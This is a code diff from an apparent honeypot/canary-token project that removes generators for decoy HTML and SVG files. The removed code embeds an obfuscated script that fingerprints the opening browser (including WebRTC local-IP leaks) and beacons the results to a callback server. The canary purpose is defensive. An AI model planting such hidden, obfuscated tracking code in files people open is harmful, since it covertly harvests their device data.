asyncio.ensure_future(self._hook(slug, query, addr[0]))
|
||||
asyncio.create_task(self._hook(slug, query, addr[0]))
|
||||
|
||||
def _slug_for(self, qname: str) -> Optional[str]:
|
||||
if not self._zone or not qname.endswith(self._suffix):
|
||||
|
||||
@@ -21,8 +21,6 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
|
||||
"honeydoc_docx",
|
||||
"honeydoc_pdf",
|
||||
"mysql_dump",
|
||||
"fingerprint_html",
|
||||
"fingerprint_svg",
|
||||
)
|
||||
|
||||
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
|
||||
@@ -66,16 +64,6 @@ def get_generator(name: str) -> CanaryGenerator:
|
||||
if name == "mysql_dump":
|
||||
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
|
||||
return MySQLDumpGenerator()
|
||||
if name == "fingerprint_html":
|
||||
from decnet.canary.generators.fingerprint_html import (
|
||||
FingerprintHtmlGenerator,
|
||||
)
|
||||
return FingerprintHtmlGenerator()
|
||||
if name == "fingerprint_svg":
|
||||
from decnet.canary.generators.fingerprint_svg import (
|
||||
FingerprintSvgGenerator,
|
||||
)
|
||||
return FingerprintSvgGenerator()
|
||||
raise ValueError(
|
||||
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
|
||||
)
|
||||
|
||||
@@ -1,291 +0,0 @@
|
||||
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
|
||||
// canary, harvests browser primitives, and beacons the result back to the
|
||||
// canary worker. Ported from canary-self-test.html with the rendering UI
|
||||
// stripped out.
|
||||
//
|
||||
// Three placeholders are substituted by the Python builder BEFORE
|
||||
// javascript-obfuscator runs:
|
||||
//
|
||||
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
|
||||
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
|
||||
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
|
||||
//
|
||||
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
|
||||
// then a fingerprint payload sent as a base64-URL query param on a second
|
||||
// GET so the existing worker records the hit even before step-4 POST
|
||||
// support lands. Both fail-open: any error short-circuits to next step.
|
||||
|
||||
(async function () {
|
||||
var BEACON_URL = "{{BEACON_URL}}";
|
||||
var MINT_UUID = "{{MINT_UUID}}";
|
||||
var MINT_NONCE = "{{MINT_NONCE}}";
|
||||
var fp = { mint: MINT_UUID };
|
||||
|
||||
function fire(url) {
|
||||
try {
|
||||
var img = new Image();
|
||||
img.src = url;
|
||||
} catch (e) { /* swallow */ }
|
||||
}
|
||||
|
||||
// 1) bare-open beacon — fires regardless of whether the rest succeeds
|
||||
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
|
||||
|
||||
function sha256(str) {
|
||||
var buf = new TextEncoder().encode(str);
|
||||
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
|
||||
return Array.from(new Uint8Array(h))
|
||||
.map(function (b) { return b.toString(16).padStart(2, "0"); })
|
||||
.join("");
|
||||
});
|
||||
}
|
||||
|
||||
// navigator
|
||||
try {
|
||||
fp.nav = {
|
||||
ua: navigator.userAgent,
|
||||
pl: navigator.platform,
|
||||
lg: navigator.language,
|
||||
lgs: (navigator.languages || []).join(","),
|
||||
ck: navigator.cookieEnabled,
|
||||
dnt: navigator.doNotTrack,
|
||||
hc: navigator.hardwareConcurrency,
|
||||
dm: navigator.deviceMemory || null,
|
||||
tp: navigator.maxTouchPoints,
|
||||
wd: navigator.webdriver === true,
|
||||
pdf: navigator.pdfViewerEnabled || null,
|
||||
};
|
||||
} catch (e) { fp.nav = { err: String(e) }; }
|
||||
|
||||
// screen
|
||||
try {
|
||||
fp.scr = {
|
||||
w: screen.width, h: screen.height,
|
||||
aw: screen.availWidth, ah: screen.availHeight,
|
||||
cd: screen.colorDepth, pd: screen.pixelDepth,
|
||||
dpr: window.devicePixelRatio,
|
||||
iw: window.innerWidth, ih: window.innerHeight,
|
||||
or: (screen.orientation && screen.orientation.type) || null,
|
||||
};
|
||||
} catch (e) { fp.scr = { err: String(e) }; }
|
||||
|
||||
// tz / locale
|
||||
try {
|
||||
var dtf = Intl.DateTimeFormat().resolvedOptions();
|
||||
fp.tz = {
|
||||
z: dtf.timeZone, lc: dtf.locale,
|
||||
ca: dtf.calendar, ns: dtf.numberingSystem,
|
||||
off: new Date().getTimezoneOffset(),
|
||||
};
|
||||
} catch (e) { fp.tz = { err: String(e) }; }
|
||||
|
||||
// connection
|
||||
try {
|
||||
var c = navigator.connection;
|
||||
fp.cn = c ? {
|
||||
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
|
||||
} : null;
|
||||
} catch (e) { fp.cn = { err: String(e) }; }
|
||||
|
||||
// canvas
|
||||
try {
|
||||
var cv = document.createElement("canvas");
|
||||
cv.width = 280; cv.height = 60;
|
||||
var ctx = cv.getContext("2d");
|
||||
ctx.textBaseline = "top";
|
||||
ctx.font = "14px Arial";
|
||||
ctx.fillStyle = "#f60";
|
||||
ctx.fillRect(125, 1, 62, 20);
|
||||
ctx.fillStyle = "#069";
|
||||
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
|
||||
ctx.fillStyle = "rgba(102,204,0,0.7)";
|
||||
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
|
||||
var dataURL = cv.toDataURL();
|
||||
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
|
||||
} catch (e) { fp.cv = { err: String(e) }; }
|
||||
|
||||
// webgl
|
||||
try {
|
||||
var gc = document.createElement("canvas");
|
||||
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
|
||||
if (gl) {
|
||||
var ext = gl.getExtension("WEBGL_debug_renderer_info");
|
||||
fp.gl = {
|
||||
v: gl.getParameter(gl.VENDOR),
|
||||
r: gl.getParameter(gl.RENDERER),
|
||||
ver: gl.getParameter(gl.VERSION),
|
||||
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
|
||||
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
|
||||
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
|
||||
};
|
||||
} else { fp.gl = { err: "unavailable" }; }
|
||||
} catch (e) { fp.gl = { err: String(e) }; }
|
||||
|
||||
// audio
|
||||
try {
|
||||
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
|
||||
if (ACtx) {
|
||||
var actx = new ACtx(1, 44100, 44100);
|
||||
var osc = actx.createOscillator();
|
||||
var cmp = actx.createDynamicsCompressor();
|
||||
osc.type = "triangle"; osc.frequency.value = 10000;
|
||||
cmp.threshold.value = -50; cmp.knee.value = 40;
|
||||
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
|
||||
osc.connect(cmp); cmp.connect(actx.destination);
|
||||
osc.start(0);
|
||||
var buf = await actx.startRendering();
|
||||
var data = buf.getChannelData(0).slice(4500, 5000);
|
||||
var sum = 0;
|
||||
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
|
||||
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
|
||||
} else { fp.au = { err: "unavailable" }; }
|
||||
} catch (e) { fp.au = { err: String(e) }; }
|
||||
|
||||
// fonts
|
||||
try {
|
||||
var bases = ["monospace", "sans-serif", "serif"];
|
||||
var tests = [
|
||||
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
|
||||
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
|
||||
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
|
||||
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
|
||||
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
|
||||
"San Francisco", "Helvetica Neue", "Lucida Grande",
|
||||
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
|
||||
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
|
||||
"Noto Sans", "Noto Mono",
|
||||
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
|
||||
"Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
|
||||
"Malgun Gothic", "Noto Sans CJK",
|
||||
"Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
|
||||
"Bahnschrift", "Cyberpunk",
|
||||
];
|
||||
var sp = document.createElement("span");
|
||||
sp.style.fontSize = "72px";
|
||||
sp.style.position = "absolute";
|
||||
sp.style.left = "-9999px";
|
||||
sp.innerHTML = "mmmmmmmmmmlli";
|
||||
document.body.appendChild(sp);
|
||||
var bs = {};
|
||||
for (var bi = 0; bi < bases.length; bi++) {
|
||||
sp.style.fontFamily = bases[bi];
|
||||
bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
|
||||
}
|
||||
var det = [];
|
||||
for (var ti = 0; ti < tests.length; ti++) {
|
||||
for (var bj = 0; bj < bases.length; bj++) {
|
||||
sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
|
||||
if (sp.offsetWidth !== bs[bases[bj]].w ||
|
||||
sp.offsetHeight !== bs[bases[bj]].h) {
|
||||
det.push(tests[ti]); break;
|
||||
}
|
||||
}
|
||||
}
|
||||
document.body.removeChild(sp);
|
||||
fp.ft = {
|
||||
h: await sha256(det.slice().sort().join(",")),
|
||||
n: det.length, t: tests.length, d: det,
|
||||
};
|
||||
} catch (e) { fp.ft = { err: String(e) }; }
|
||||
|
||||
// webrtc local ip leak
|
||||
try {
|
||||
var ips = {}; var cands = [];
|
||||
var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
|
||||
window.mozRTCPeerConnection;
|
||||
if (RPC) {
|
||||
var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
|
||||
pc.createDataChannel("");
|
||||
pc.onicecandidate = function (e) {
|
||||
if (!e.candidate) return;
|
||||
cands.push(e.candidate.candidate);
|
||||
var m = e.candidate.candidate.match(
|
||||
/(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
|
||||
if (m) ips[m[1]] = 1;
|
||||
};
|
||||
var off = await pc.createOffer();
|
||||
await pc.setLocalDescription(off);
|
||||
await new Promise(function (r) { setTimeout(r, 1500); });
|
||||
pc.close();
|
||||
fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
|
||||
} else { fp.rtc = { err: "unavailable" }; }
|
||||
} catch (e) { fp.rtc = { err: String(e) }; }
|
||||
|
||||
// battery
|
||||
try {
|
||||
if (navigator.getBattery) {
|
||||
var bat = await navigator.getBattery();
|
||||
fp.bt = {
|
||||
c: bat.charging, l: bat.level,
|
||||
ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
|
||||
dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
|
||||
};
|
||||
} else { fp.bt = { err: "unavailable" }; }
|
||||
} catch (e) { fp.bt = { err: String(e) }; }
|
||||
|
||||
// perf timing jitter
|
||||
try {
|
||||
var samples = [];
|
||||
for (var pi = 0; pi < 1000; pi++) {
|
||||
var pa = performance.now();
|
||||
var x = 0;
|
||||
for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
|
||||
samples.push(performance.now() - pa);
|
||||
}
|
||||
samples.sort(function (a, b) { return a - b; });
|
||||
fp.pf = {
|
||||
med: samples[500].toFixed(4),
|
||||
p95: samples[950].toFixed(4),
|
||||
mn: samples[0].toFixed(4),
|
||||
mx: samples[999].toFixed(4),
|
||||
};
|
||||
} catch (e) { fp.pf = { err: String(e) }; }
|
||||
|
||||
// permissions
|
||||
try {
|
||||
if (navigator.permissions) {
|
||||
var names = ["geolocation", "notifications", "camera", "microphone",
|
||||
"persistent-storage", "clipboard-read", "clipboard-write"];
|
||||
var st = {};
|
||||
for (var ni = 0; ni < names.length; ni++) {
|
||||
try {
|
||||
var r = await navigator.permissions.query({ name: names[ni] });
|
||||
st[names[ni]] = r.state;
|
||||
} catch (e) { st[names[ni]] = "unsupported"; }
|
||||
}
|
||||
fp.pm = st;
|
||||
} else { fp.pm = { err: "unavailable" }; }
|
||||
} catch (e) { fp.pm = { err: String(e) }; }
|
||||
|
||||
// composite identity hash — stable inputs only
|
||||
try {
|
||||
var stable = [
|
||||
fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
|
||||
fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
|
||||
fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
|
||||
fp.scr && (fp.scr.w + "x" + fp.scr.h),
|
||||
].filter(Boolean).join("|");
|
||||
fp.id = await sha256(stable);
|
||||
} catch (e) { fp.id = { err: String(e) }; }
|
||||
|
||||
// 2) ship the payload as base64url JSON on a GET query param.
|
||||
// The current worker records the hit on /c/<slug>; step-4 worker
|
||||
// will decode ?d= and persist the fingerprint blob.
|
||||
try {
|
||||
var json = JSON.stringify(fp);
|
||||
var b64 = btoa(unescape(encodeURIComponent(json)))
|
||||
.replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
|
||||
// chunk if URL would exceed safe limit (~6KB)
|
||||
var MAX = 6000;
|
||||
if (b64.length <= MAX) {
|
||||
fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
|
||||
} else {
|
||||
var sid = (Math.random() * 1e9 | 0).toString(36);
|
||||
var total = Math.ceil(b64.length / MAX);
|
||||
for (var ci = 0; ci < total; ci++) {
|
||||
var part = b64.substr(ci * MAX, MAX);
|
||||
fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
|
||||
}
|
||||
}
|
||||
} catch (e) { /* swallow */ }
|
||||
})();
|
||||
@@ -1,140 +0,0 @@
|
||||
"""HTML fingerprint canary — plausible-looking page with an obfuscated
|
||||
browser-fingerprinting payload inlined at the bottom of ``<body>``.
|
||||
|
||||
The visible content is a deliberately mundane "internal directory"
|
||||
table — the kind of file a curious attacker pulls off a decky's
|
||||
filesystem and opens locally to triage. When the file is opened in
|
||||
*any* network-connected browser the obfuscated payload runs and beacons
|
||||
to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
|
||||
fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
|
||||
timing jitter, permissions, composite identity hash).
|
||||
|
||||
Determinism: the mint UUID is derived from the callback token via
|
||||
:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
|
||||
output, satisfying the generator contract in :mod:`decnet.canary.base`.
|
||||
The obfuscator's seed and polymorphic config bits are likewise
|
||||
callback-token-derived (see :mod:`decnet.canary.obfuscator`).
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import uuid
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||
|
||||
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||
|
||||
|
||||
def _mint_uuid_for(callback_token: str) -> str:
|
||||
return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
|
||||
|
||||
|
||||
def _stable_int(callback_token: str, salt: str = "") -> int:
|
||||
"""Deterministic non-negative int derived from the callback token.
|
||||
|
||||
``builtins.hash`` is salted per-process — useless for a generator
|
||||
that must be byte-identical across runs. SHA-256 prefix is
|
||||
overkill but free.
|
||||
"""
|
||||
h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
|
||||
return int.from_bytes(h[:4], "big")
|
||||
|
||||
|
||||
_PAGE_TEMPLATE = """<!DOCTYPE html>
|
||||
<html lang="en">
|
||||
<head>
|
||||
<meta charset="utf-8">
|
||||
<title>Internal Asset Directory</title>
|
||||
<style>
|
||||
body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
|
||||
margin:24px;font-size:13px}}
|
||||
h1{{font-size:18px;margin:0 0 4px 0}}
|
||||
.sub{{color:#777;font-size:11px;margin-bottom:18px}}
|
||||
table{{border-collapse:collapse;width:100%;background:#fff;
|
||||
box-shadow:0 1px 2px rgba(0,0,0,.05)}}
|
||||
th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
|
||||
th{{background:#f4f4f4;font-weight:600;font-size:11px;
|
||||
text-transform:uppercase;letter-spacing:.5px;color:#555}}
|
||||
tr:hover td{{background:#fafbff}}
|
||||
.foot{{margin-top:16px;color:#999;font-size:11px}}
|
||||
</style>
|
||||
</head>
|
||||
<body>
|
||||
<h1>Internal Asset Directory</h1>
|
||||
<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
|
||||
<table>
|
||||
<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
|
||||
{rows}
|
||||
</table>
|
||||
<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
|
||||
<script>{payload}</script>
|
||||
</body>
|
||||
</html>
|
||||
"""
|
||||
|
||||
|
||||
_ROW_POOL = (
|
||||
("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
|
||||
("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
|
||||
("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
|
||||
("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
|
||||
("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
|
||||
("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
|
||||
("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
|
||||
("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
|
||||
("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
|
||||
)
|
||||
|
||||
|
||||
def _build_rows(callback_token: str) -> tuple[str, int]:
|
||||
pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
|
||||
take = 5 + (_stable_int(callback_token, "take") % 4)
|
||||
selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
|
||||
cells = "\n".join(
|
||||
"<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
|
||||
for row in selected
|
||||
)
|
||||
return cells, len(selected)
|
||||
|
||||
|
||||
def _sync_label(callback_token: str) -> str:
|
||||
day = _stable_int(callback_token, "day") % 28 + 1
|
||||
hour = _stable_int(callback_token, "hour") % 24
|
||||
return f"2026-04-{day:02d} {hour:02d}:14 UTC"
|
||||
|
||||
|
||||
class FingerprintHtmlGenerator(CanaryGenerator):
|
||||
"""Synthesise an HTML page that fingerprints the browser opening it."""
|
||||
|
||||
name = "fingerprint_html"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
mint_uuid = _mint_uuid_for(ctx.callback_token)
|
||||
nonce = nonce_for(ctx.callback_token, mint_uuid)
|
||||
payload = render_fingerprint_js(
|
||||
callback_token=ctx.callback_token,
|
||||
http_base=ctx.http_base,
|
||||
mint_uuid=mint_uuid,
|
||||
nonce=nonce,
|
||||
)
|
||||
rows, row_count = _build_rows(ctx.callback_token)
|
||||
body = _PAGE_TEMPLATE.format(
|
||||
sync_label=_sync_label(ctx.callback_token),
|
||||
row_count=row_count,
|
||||
rows=rows,
|
||||
payload=payload,
|
||||
)
|
||||
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=body.encode("utf-8"),
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 14,
|
||||
generator=self.name,
|
||||
fingerprint_nonce=nonce,
|
||||
notes=[
|
||||
f"obfuscated fingerprinter beacons={beacon}",
|
||||
f"mint_uuid={mint_uuid}",
|
||||
],
|
||||
)
|
||||
@@ -1,88 +0,0 @@
|
||||
"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
|
||||
that runs the obfuscated fingerprinter when the file is opened directly
|
||||
in a browser.
|
||||
|
||||
SVG ``<script>`` only fires when the SVG is loaded as a top-level
|
||||
document (or via ``<object>``/``<iframe>``); it's *blocked* when the
|
||||
SVG is referenced from another page's ``<img>``. That's the right
|
||||
posture for canary use: an attacker browsing the decky filesystem and
|
||||
double-clicking a stray ``network_diagram.svg`` triggers it; rendering
|
||||
inside a sandboxed CMS preview does not.
|
||||
|
||||
Same determinism guarantees as :mod:`fingerprint_html`.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
|
||||
from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
|
||||
from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
|
||||
|
||||
|
||||
_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
|
||||
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
|
||||
<style>
|
||||
.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
|
||||
.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
|
||||
.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
|
||||
.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
|
||||
.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
|
||||
</style>
|
||||
<text class="title" x="20" y="28">Network Topology — {region} segment</text>
|
||||
<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
|
||||
<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
|
||||
<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
|
||||
<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
|
||||
<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
|
||||
<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
|
||||
<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
|
||||
<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
|
||||
<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
|
||||
<path class="edge" d="M160 105 L240 105"/>
|
||||
<path class="edge" d="M360 105 L440 105"/>
|
||||
<path class="edge" d="M300 130 L300 220"/>
|
||||
<script type="application/ecmascript"><![CDATA[
|
||||
{payload}
|
||||
]]></script>
|
||||
</svg>
|
||||
"""
|
||||
|
||||
|
||||
_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
|
||||
|
||||
|
||||
class FingerprintSvgGenerator(CanaryGenerator):
|
||||
"""Synthesise an SVG that fingerprints the browser opening it."""
|
||||
|
||||
name = "fingerprint_svg"
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
mint_uuid = _mint_uuid_for(ctx.callback_token)
|
||||
nonce = nonce_for(ctx.callback_token, mint_uuid)
|
||||
payload = render_fingerprint_js(
|
||||
callback_token=ctx.callback_token,
|
||||
http_base=ctx.http_base,
|
||||
mint_uuid=mint_uuid,
|
||||
nonce=nonce,
|
||||
)
|
||||
region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
|
||||
ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
|
||||
day = _stable_int(ctx.callback_token, "day") % 28 + 1
|
||||
body = _DIAGRAM_TEMPLATE.format(
|
||||
region=region,
|
||||
ver=ver,
|
||||
review=f"2026-03-{day:02d}",
|
||||
payload=payload,
|
||||
)
|
||||
beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
|
||||
return CanaryArtifact(
|
||||
path="",
|
||||
content=body.encode("utf-8"),
|
||||
mode=0o644,
|
||||
mtime_offset=-86400 * 30,
|
||||
generator=self.name,
|
||||
fingerprint_nonce=nonce,
|
||||
notes=[
|
||||
f"obfuscated fingerprinter beacons={beacon}",
|
||||
f"mint_uuid={mint_uuid}",
|
||||
],
|
||||
)
|
||||
@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):
|
||||
|
||||
def generate(self, ctx: CanaryContext) -> CanaryArtifact:
|
||||
try:
|
||||
from pikepdf import Pdf, Name, Dictionary, String
|
||||
from pikepdf import Pdf, Name, Dictionary, String # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"honeydoc_pdf requires pikepdf; install it (`pip install "
|
||||
|
||||
@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
try:
|
||||
from PIL import Image, PngImagePlugin
|
||||
from PIL import Image, PngImagePlugin # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"image instrumenter requires Pillow; install it (`pip "
|
||||
|
||||
@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
|
||||
self, blob: bytes, ctx: CanaryContext, *, target_path: str,
|
||||
) -> CanaryArtifact:
|
||||
try:
|
||||
import pikepdf
|
||||
import pikepdf # type: ignore[import-not-found]
|
||||
except ImportError as e:
|
||||
raise InstrumenterRejectedError(
|
||||
"PDF instrumenter requires pikepdf; install it (`pip "
|
||||
|
||||
@@ -1,177 +0,0 @@
|
||||
"""Per-mint JS obfuscator wrapper.
|
||||
|
||||
Thin Python wrapper around the ``javascript-obfuscator`` Node package.
|
||||
Used by the fingerprint generators / instrumenters to produce a unique,
|
||||
hard-to-statically-analyse JS blob per canary mint.
|
||||
|
||||
Two design choices flow from the canary contract in :mod:`base`:
|
||||
|
||||
* **Determinism.** Generators must return byte-identical artifacts for
|
||||
the same ``(callback_token, http_base, dns_zone, persona)``. We
|
||||
derive a numeric seed from the callback token and pass it to the
|
||||
obfuscator's own ``seed`` option, and we derive the polymorphic
|
||||
config bits from the same hash so a re-mint reproduces exactly.
|
||||
* **Per-mint uniqueness.** Two different callback tokens produce
|
||||
structurally different output: different identifier names, different
|
||||
string-array rotation, optionally different transforms enabled.
|
||||
|
||||
The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
|
||||
We pass code+options as JSON on stdin and read the obfuscated result
|
||||
from stdout. Stderr surfaces obfuscator failures.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
import hashlib
|
||||
import hmac
|
||||
import json
|
||||
import os
|
||||
import subprocess # nosec B404 — Node helper exec is the whole point
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
|
||||
_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
|
||||
|
||||
# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
|
||||
# specific runtime; default to PATH lookup.
|
||||
_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
|
||||
|
||||
# Hard timeout for the obfuscator subprocess. Real runs on the
|
||||
# fingerprint payload sit well under 5s on a dev box.
|
||||
_TIMEOUT_S = 30
|
||||
|
||||
|
||||
class ObfuscatorError(RuntimeError):
|
||||
"""Raised when the Node helper fails or returns empty output."""
|
||||
|
||||
|
||||
class FingerprintSecretMissing(RuntimeError):
|
||||
"""Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
|
||||
|
||||
Fingerprint canaries embed a per-mint nonce derived from this
|
||||
server-side secret; without it the worker cannot validate incoming
|
||||
fingerprint beacons, so we fail loud at mint time rather than ship
|
||||
a defeatable canary.
|
||||
"""
|
||||
|
||||
|
||||
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
|
||||
|
||||
|
||||
def nonce_for(callback_token: str, mint_uuid: str) -> str:
|
||||
"""Compute the per-mint fingerprint nonce.
|
||||
|
||||
HMAC-SHA256 keyed on the server-side master secret, message is
|
||||
``callback_token + "|" + mint_uuid``. Truncated to 16 hex chars
|
||||
(~64 bits of entropy) — enough to defeat slug-only forgery while
|
||||
fitting comfortably into a query string.
|
||||
"""
|
||||
secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
|
||||
if not secret:
|
||||
raise FingerprintSecretMissing(
|
||||
f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
|
||||
)
|
||||
msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
|
||||
return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
|
||||
|
||||
|
||||
def _seed_from_token(callback_token: str) -> int:
|
||||
"""Derive a 31-bit numeric seed from the callback token.
|
||||
|
||||
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
|
||||
using a SHA-256-derived prefix gives us a uniform distribution
|
||||
across the 31-bit positive range.
|
||||
"""
|
||||
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
|
||||
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
|
||||
|
||||
|
||||
def _config_from_seed(seed: int) -> dict[str, Any]:
|
||||
"""Build a deterministic, per-mint obfuscator config.
|
||||
|
||||
The hash bits drive *which* transforms apply — two mints get
|
||||
structurally different outputs, not just different identifier names.
|
||||
Defaults stay aggressive enough that reverse engineering is real
|
||||
work; we never disable string-array or rename, only vary the dial.
|
||||
"""
|
||||
bits = seed
|
||||
encodings = ("base64", "rc4")
|
||||
string_array_encoding = [encodings[bits & 1]]
|
||||
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
|
||||
